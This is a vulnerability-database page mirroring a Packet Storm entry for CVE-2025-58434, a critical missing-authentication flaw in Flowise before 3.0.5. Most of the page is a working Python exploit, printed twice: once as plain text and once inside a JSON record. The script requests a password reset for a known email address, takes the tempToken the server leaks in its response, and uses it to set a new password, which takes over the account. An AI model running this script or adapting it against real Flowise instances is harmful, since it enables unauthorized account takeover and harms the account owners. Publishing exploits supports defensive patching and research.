📄 Flowise Missing Authentication_PACKETSTORM:220959

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Proof of concept for Flowise versions prior to 3.0.5 that suffer from a missing authentication vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:220959

Published May 13, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Flowise < 3.0.5 - Missing Authentication for Critical Function
# Date: 10/11/2025
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise
# Version: < 3.0.5
# CVE: CVE-2025-58434

from requests import post
from argparse import ArgumentParser

banner = r"""
_____ _ _____
/ __ \ | | / ___|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
__/ |
|___/

by nltt0
"""

print(banner)

try:
parser = ArgumentParser(description='CVE-2025-58434 [FlowiseAI < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --newpassword Test@2025 --url http://localhost:3000")
parser.add_argument('-e', '--email', required=True, help='Registered email')
parser.add_argument('-p', '--newpassword', required=True)
parser.add_argument('-u', '--url', required=True)

args = parser.parse_args()
email = args.email
password = args.newpassword
url = args.url

headers = {
'Content-Type': 'application/json'
}

data = {
'user': {'email': email}
}

url_format1 = '{}/api/v1/account/forgot-password'.format(url)
req = post(url_format1, headers=headers, json=data)

if req.status_code == 201:
req_json = req.json()
temp_token = req_json['user']['tempToken']

data = {
'user': {'email': email,
'tempToken': temp_token,
"password": password
}
}
url_format2 = '{}/api/v1/account/reset-password'.format(url)
req = post(url_format2, headers=headers, json=data)
print('[x] Password changed')

else:
print('[x] Unregistered user')

except Exception as e:
print('Error in {}'.format(e))

{
    "lastseen": "2026-05-13T17:48:00",
    "description": "Proof of concept for Flowise versions prior to 3.0.5 that suffer from a missing authentication vulnerability...",
    "published": "2026-05-13T00:00:00",
    "modified": "2026-05-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Flowise Missing Authentication",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220959",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-58434"
    ],
    "sourceData": "# Exploit Title: Flowise < 3.0.5 - Missing Authentication for Critical Function\n    # Date: 10/11/2025\n    # Exploit Author: [nltt0] (https://github.com/nltt-br))\n    # Vendor Homepage: https://flowiseai.com/\n    # Software Link: https://github.com/FlowiseAI/Flowise\n    # Version: < 3.0.5\n    # CVE: CVE-2025-58434\n    \n    from requests import post \n    from argparse import ArgumentParser\n    \n    banner = r\"\"\"\n    _____       _                              _____ \n    /  __ \\     | |                            /  ___|\n    | /  \\/ __ _| | __ _ _ __   __ _  ___  ___ \\ `--. \n    | |    / _` | |/ _` | '_ \\ / _` |/ _ \\/ __| `--. \\\n    | \\__/\\ (_| | | (_| | | | | (_| | (_) \\__ \\/\\__/ /\n    \\____/\\__,_|_|\\__,_|_| |_|\\__, |\\___/|___/\\____/ \n                                __/ |                 \n                              |___/                  \n                    \n                    by nltt0\n    \"\"\"\n    \n    print(banner)\n    \n    try:\n        parser = ArgumentParser(description='CVE-2025-58434 [FlowiseAI < 3.0.5]', usage=\"python CVE-2025-58434.py --email xtz@local --newpassword Test@2025 --url http://localhost:3000\")\n        parser.add_argument('-e', '--email', required=True, help='Registered email')\n        parser.add_argument('-p', '--newpassword', required=True)\n        parser.add_argument('-u', '--url', required=True)\n    \n        args = parser.parse_args()\n        email = args.email\n        password = args.newpassword\n        url = args.url\n        \n        headers = {\n            'Content-Type': 'application/json'\n        }\n    \n        data = {\n            'user': {'email': email}\n        }\n    \n        url_format1 = '{}/api/v1/account/forgot-password'.format(url)\n        req = post(url_format1, headers=headers, json=data)\n    \n        if req.status_code == 201:\n            req_json = req.json()\n            temp_token = req_json['user']['tempToken']\n    \n            data = {\n                'user': {'email': email,\n                        'tempToken': temp_token,\n                        \"password\": password\n                        }\n            }\n            url_format2 = '{}/api/v1/account/reset-password'.format(url)\n            req = post(url_format2, headers=headers, json=data)\n            print('[x] Password changed')\n        \n        else:\n            print('[x] Unregistered user')\n    \n    except Exception as e:\n        print('Error in {}'.format(e))",
    "sourceHref": "https://packetstorm.news/download/220959",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220959/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply